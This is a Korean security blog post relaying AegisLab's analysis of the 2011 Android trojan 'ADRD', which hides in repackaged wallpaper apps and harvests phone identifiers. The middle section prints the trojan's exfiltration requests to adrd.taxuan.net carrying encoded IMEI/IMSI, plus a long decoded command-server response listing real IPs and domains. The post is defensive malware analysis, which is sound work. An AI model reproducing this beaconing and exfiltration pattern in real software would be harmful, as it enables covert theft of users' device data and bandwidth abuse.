안드로이드(Android), 새로운 안드로이드 트로이목마 "ADRD" 발견

모바일 보안업체인 AegisLab에서 새로운 안드로이드 트로이목마 “ADRD”를 발견했다고 한다.

Geinimi와 동일하게 정상패키지에 악성코드를 삽입 후 리패키징 한 것으로 보여지며, 사용자 정보를 특정 서버로 전송시키는 것으로 확인된다.

전송시키는 서버가 adrd.taxuan.net 이라서 ADRD로 명명한 것으로 보여진다 ㅎㅎ

- 원본보기 : http://blog.aegislab.com/index.php?op=ViewArticle&articleId=75&blogId=1

Security Alert 2011-02-14: New Android Trojan 'ADRD" Was Found in the Wild by Aegislab

     AegisLab is devoted in protecting the security of mobile users, we collect and analyaze the Android packages for two years.  Today, we found a new Android trojan, we call it "ADRD", which was not reported by any security vendors before.

    In our analysis, the malware writer repackaged(infected) legal apps, especially wallpapers that do not usually appear on apps panel, therefore users may rarely notice it. This trojan compromises personal data such as IMEI/IMSI of the device and sends them back to the remote side to react  based on the commands from there. The infected applications request extensive permissions like RECEIVE_BOOT_COMPLETED, ACCESS_NETWORK_STATE to be able to run in the background once the event occurs. It also schedules an alerm to wake itself up regularly. However, it's somewhat lower profile than 'GEIMINI' trojan found last year. Fewer messages/commands sent and less bandwidth consumed by this trojan. Users may not even notice it after weeks but still suffer data leakage and bandwidth consumption.

How it works:

    It registers several receivers to intercept events such as boot complete, net connectivity change, and etc. Then starts a service in the background once the event occurs. The service firstly connects back to the server via http with DES encoded string like

POST /index.aspx?im=6363ea04af859e4c5b839761a04e04f0b7d5868546a5471587b5db8848de8d7a2efc443455fa0839828c592920ddc1e c6ea1b3acf2b97d46 HTTP/1.1 HOST: adrd.taxuan.net

    After decoded, we have:

354059xxxxxxxxx&310260xxxxxxxxx&1&6&adrd.zt.cw.4

   

    It sends back IMEI/IMSI of the phone together with some version numbers of the trojan for the server to decide next step. Later the server responded a list of urls:

POST /pic.aspx?im=6363ea04af859e4c5b839761a04e04f0b7d5868546a54715a7786e2a0e5e894e HTTP/1.1 RESPONSE(decoded): B#1#963a_w1|http://59.173.12.105/g/g.ashx?w=963a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#961a_w1|http://59.173.12.105/g/g.ashx?w=961a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#964a_w1|http://59.173.12.105/g/g.ashx?w=964a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#881d_w1|http://59.173.12.105/g/g.ashx?w=881d_w1|1|http://59.173.12.105/add/pk.aspx$%3Cbr%20/%3EB#1#978a_w1|http://59.173.12.105/g/g.ashx?w=978a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#979a_w1|http://59.173.12.105/g/g.ashx?w=979a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#609b_w1|http://59.173.12.105/g/g.ashx?w=609b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1044a_w1|http://59.173.12.105/g/g.ashx?w=1044a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#999a_w1|http://59.173.12.105/g/g.ashx?w=999a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#999b_w1|http://59.173.12.105/g/g.ashx?w=999b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#999c_w1|http://59.173.12.105/g/g.ashx?w=999c_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1059a_w1|http://59.173.12.105/g/g.ashx?w=1059a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1060a_w1|http://59.173.12.105/g/g.ashx?w=1060a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1059b_w1|http://59.173.12.105/g/g.ashx?w=1059b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086d_w1|http://59.173.12.105/g/g.ashx?w=1086d_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086e_w1|http://59.173.12.105/g/g.ashx?w=1086e_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086f_w1|http://59.173.12.105/g/g.ashx?w=1086f_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086g_w1|http://59.173.12.105/g/g.ashx?w=1086g_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086h_w1|http://59.173.12.105/g/g.ashx?w=1086h_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086r_w1|http://59.173.12.105/g/g.ashx?w=1086r_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086t_w1|http://59.173.12.105/g/g.ashx?w=1086t_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1089b_w1|http://g.gxsmy.com/?w=1089b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1089c_w1|http://g.gxsmy.com/?w=1089c_w1|1|http://59.173.12.105/add/pk.asp%3Cbr%20/%3Ex$B#1#1089d_w1|http://g.gxsmy.com/?w=1089d_w1|1|http://59.173.12.105/add/pk.aspx$B#1#962a_w1|http://59.173.12.105/g/g.ashx?w=962a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#768b_w1|http://59.173.12.105/g/g.ashx?w=768b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#965a_w1|http://59.173.12.105/g/g.ashx?w=965a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#780b_w1|http://59.173.12.105/g/g.ashx?w=780b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#834b_w1|http://59.173.12.105/g/g.ashx?w=834b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#959a_w1|http://59.173.12.105/g/g.ashx?w=959a_w1|1|http://59.173.12.105/add/pk.aspx$

    After few http requests sent back and forth, it gets a URL to connect in the background (in this case analyzed): http://wap.baidu.com/s?word=%e7%83%a8%e4%b9%8b%e5%9b%bd%e5%ba%a6&vit=uni&from=961a_w1

    The malware writer may benefit from the random link users connect, and users are sufferred by data disclosure as well as bandwidth consumption(higher net bill).